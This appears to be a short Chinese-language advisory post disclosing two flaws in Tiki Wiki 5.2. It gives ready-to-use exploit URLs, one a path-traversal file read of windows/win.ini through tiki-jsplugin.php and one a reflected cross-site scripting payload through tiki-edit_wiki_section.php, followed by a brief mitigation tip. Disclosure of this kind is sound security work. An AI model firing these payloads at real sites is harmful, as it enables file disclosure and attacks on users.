攻击者可以通过浏览器利用这些问题。利用一个跨站点脚本问题,攻击者必须诱使不知情的用户点击一个恶意的URI。
本地文件漏洞EXP:

网站/tiki-5.2/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini

跨站脚本漏洞:

网站/tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

注:首发孤独浪子,由情整理编辑

防范:

过滤或临时加入通用防注入文件